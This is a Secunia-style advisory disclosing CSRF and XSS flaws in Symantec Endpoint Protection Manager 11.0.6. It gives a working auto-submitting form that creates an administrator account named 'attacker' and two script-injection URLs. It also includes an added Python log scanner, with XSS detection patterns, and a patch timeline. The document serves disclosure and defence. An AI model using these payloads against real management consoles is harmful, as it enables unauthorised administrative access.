Symantec Endpoint Protection Manager Console lets users centrally manage Symantec Endpoint Protection clients. From the console, users can install clients, set and enforce a security policy, and monitor and report on the clients. The console can be run from the computer hosting Symantec Endpoint Protection Manager or remotely through a web-based interface.
Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple vulnerabilities in Symantec Endpoint Protection Manager. These issues were discovered in a default installation of Symantec Endpoint Protection Manager 11.0.6. Other earlier versions may also be affected.
Proof of concept
Cross-Site Request Forgery (CSRF)
================================
<html>
<body>
<form action="https://[target]:8443/portal/Settings.jsp?action=NewAccount"
id="csrf" method="post">
<input type="hidden" name="spcName" value="attacker" />
<input type="hidden" name="spcUsername" value="attacker" />
<input type="hidden" name="spcNewPwd" value="passwd123" />
<input type="hidden" name="spcNewPwd2" value="passwd123" />
<input type="hidden" name="group1" value="Admin" />
<input type="hidden" name="btnSubmit" value="Create+Account" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>
Cross-Site Scripting (XSS)
==========================
- https://[target]:8443/console/apps/sepm/?>'"><script>alert(1)</script>
- https://[target]:8443/portal/Help.jsp?token='"--></style></script><script>alert(1)</script>
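As an added example that is not part of the advisory, the following Python script scans constructed web-server access-log lines for the two request shapes described above: an account-creation POST to Settings.jsp whose Referer is not the console itself (the CSRF case), and a console URL whose query string carries injected markup (the XSS case). The log format, the console host name and the sample lines are assumptions made for this demonstration.

```python
# Added example (not part of the original advisory): hunt in constructed
# access-log lines for the two request shapes the advisory describes.
# Log format, console host name and sample lines are assumed for the demo.
import re
from urllib.parse import unquote, urlsplit

SEPM_HOST = "sepm.example.internal"  # assumed console host name

# Apache/NGINX "combined" style:
# ip - - [ts] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" \d+ \S+ "([^"]*)" "[^"]*"$'
)

# Markup that should never legitimately appear in a console query string.
XSS_RE = re.compile(r"<\s*/?\s*(script|style)\b|\bon\w+\s*=|['\"]\s*>", re.IGNORECASE)


def classify(line):
    """Return a finding label for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, raw_path, referer = m.groups()
    path = unquote(raw_path)
    # CSRF indicator: the account-creation POST should originate from the
    # console itself. A missing Referer is also flagged (browsers may strip
    # it, so treat that case as "review", not proof).
    if method == "POST" and path.startswith("/portal/Settings.jsp") and "action=NewAccount" in path:
        ref_host = urlsplit(referer).hostname if referer and referer != "-" else None
        if ref_host != SEPM_HOST:
            return "csrf-newaccount"
    # XSS indicator: decode the query string and look for injected markup.
    if XSS_RE.search(urlsplit(path).query):
        return "xss-probe"
    return None


def scan(lines):
    """Return (line number, label) pairs for every flagged line."""
    return [(i, label) for i, label in enumerate(map(classify, lines), start=1) if label]


# Constructed sample lines: benign console load, cross-site account creation, XSS probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Aug/2011:10:00:01 +0000] "GET /console/apps/sepm/ HTTP/1.1" 200 512 "https://sepm.example.internal:8443/console/" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Aug/2011:10:00:07 +0000] "POST /portal/Settings.jsp?action=NewAccount HTTP/1.1" 302 0 "http://lure.example/page.html" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Aug/2011:10:00:12 +0000] "GET /console/apps/sepm/?%3E%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, label in scan(SAMPLE_LOG):
        print(f"line {lineno}: {label}")
```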
Solution
Symantec has released patches which address these issues. Please see the references for more information.
References
Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110810_00
Secunia: http://secunia.com/advisories/43662/
Disclosure Timeline
2011-03-07 - Vulnerabilities discovered.
2011-03-07 - Vulnerabilities reported to Secunia.
2011-03-09 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-08-10 - Patch released.
2011-08-11 - Advisory published by Secunia.